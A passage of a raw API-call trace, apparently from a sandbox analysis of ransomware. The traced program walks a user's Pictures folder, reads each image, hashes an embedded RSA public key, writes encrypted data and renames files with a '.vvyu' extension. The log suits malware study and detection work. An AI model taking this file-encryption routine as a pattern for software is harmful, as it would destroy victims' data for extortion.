lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0190.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3078 | out: hHeap=0x2c0000) returned 1 [0190.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.250] WriteFile (in: hFile=0x584, lpBuffer=0x2ae5ea0*, nNumberOfBytesToWrite=0x12f7, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae5ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x12f7, lpOverlapped=0x0) returned 1 [0190.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ea0 | out: hHeap=0x2c0000) returned 1 [0190.251] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.251] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.253] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.254] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.254] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.254] CloseHandle (hObject=0x584) returned 1 [0190.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0190.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0190.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0190.256] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\5_Xd oyQT5yLzW2rnd.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\5_xd oyqt5ylzw2rnd.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\5_Xd oyQT5yLzW2rnd.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\5_xd oyqt5ylzw2rnd.bmp.vvyu")) returned 1 [0190.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.257] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0190.261] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5260b040, ftCreationTime.dwHighDateTime=0x1d8a302, ftLastAccessTime.dwLowDateTime=0xf3173fc0, ftLastAccessTime.dwHighDateTime=0x1d8a46c, ftLastWriteTime.dwLowDateTime=0xf3173fc0, ftLastWriteTime.dwHighDateTime=0x1d8a46c, nFileSizeHigh=0x0, nFileSizeLow=0x16e78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7p5JBw.jpg", cAlternateFileName="")) returned 1 [0190.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3078 [0190.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3078 | out: hHeap=0x2c0000) returned 1 [0190.261] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\7p5JBw.jpg") returned=".jpg" [0190.261] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\7p5JBw.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\7p5jbw.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.265] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=93816) returned 1 [0190.265] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.268] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16e52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.268] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.270] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.270] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x16e78, lpOverlapped=0x0) returned 1 [0190.271] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.271] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.271] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.271] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.272] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.272] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.273] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.273] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.273] GetLastError () returned 0x0 [0190.273] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.273] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.273] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.273] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.273] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16e80) returned 0x2af5168 [0190.274] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3078 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af30c0 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.275] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc70 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dc58 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.278] GetCurrentThreadId () returned 0x5d8 [0190.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4ba8 [0190.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.279] GetCurrentThreadId () returned 0x5d8 [0190.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc70 [0190.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0190.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dce8 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc88 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.282] 